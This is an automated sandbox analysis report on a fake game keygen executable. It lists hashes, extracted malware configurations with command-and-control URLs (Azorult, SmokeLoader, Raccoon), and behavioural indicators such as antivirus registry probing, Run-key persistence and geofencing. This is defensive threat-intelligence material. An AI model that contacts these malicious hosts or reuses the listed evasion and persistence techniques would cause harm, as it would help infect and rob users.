Analysis
-
max time kernel
43s -
max time network
309s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
General
-
Target
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
-
Size
5.4MB
-
MD5
be12bd9c6b6e9e5738e171924e141b7d
-
SHA1
a90d8051e8116fe24abf2605fae1b8ad31f12104
-
SHA256
6ffb691be76a6756dbda8cc9c12b72be6a6eb89fa32770c9f1c201393c4f708c
-
SHA512
8c2031c71b856ab8010cfee225a6987e0eb1d9870c4b154a9a75db1829d0fa790dace44352e3932332e6fc612455ddc42adbc14f6ce9f91b6a736595c2986279
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/4704-148-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/4704-155-0x00000000024A0000-0x0000000002DAA000-memory.dmp family_glupteba behavioral2/memory/4704-156-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral2/memory/6904-298-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6904-307-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6904-401-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 12 IoCs
pid Process 3660 keygen-pr.exe 3640 keygen-step-1.exe 1520 keygen-step-3.exe 3628 keygen-step-4.exe 1228 key.exe 908 Setup.exe 3568 multitimer.exe 3328 setups.exe 2284 askinstall20.exe 508 setups.tmp 4392 multitimer.exe 4492 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 508 setups.tmp 508 setups.tmp 508 setups.tmp 508 setups.tmp 508 setups.tmp 508 setups.tmp 508 setups.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dhb4zxuc5zj = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\4U7182TXSD\\multitimer.exe\" 1 3.1617432444.60680f7c1a918" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 388 ip-api.com 151 ipinfo.io 153 ipinfo.io 207 ip-api.com 223 api.ipify.org 257 api.ipify.org 338 ipinfo.io 342 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 4776 5556 WerFault.exe 150 4296 5624 WerFault.exe 146 4888 5624 WerFault.exe 146 7144 5624 WerFault.exe 146 4200 5624 WerFault.exe 146 6464 5624 WerFault.exe 146 4632 5624 WerFault.exe 146 4140 5624 WerFault.exe 146 4300 5624 WerFault.exe 146 4008 5624 WerFault.exe 146 6068 5624 WerFault.exe 146 744 5744 WerFault.exe 132 4336 5624 WerFault.exe 146 5824 5624 WerFault.exe 146 6824 5624 WerFault.exe 146 7856 4196 WerFault.exe 286 -
Delays execution with timeout.exe 3 IoCs
pid Process 3732 timeout.exe 1488 timeout.exe 4988 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 5 IoCs
pid Process 6364 taskkill.exe 2164 taskkill.exe 4260 taskkill.exe 4844 taskkill.exe 6480 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main Setup3310.tmp -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a47b27b25528d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" Setup3310.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content Setup3310.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" Setup3310.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate Setup3310.tmp Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "wf2sbde" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{AD703301-C12C-4202-B2B5-ACF76AA50F43}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache Setup3310.tmp Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" Setup3310.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local 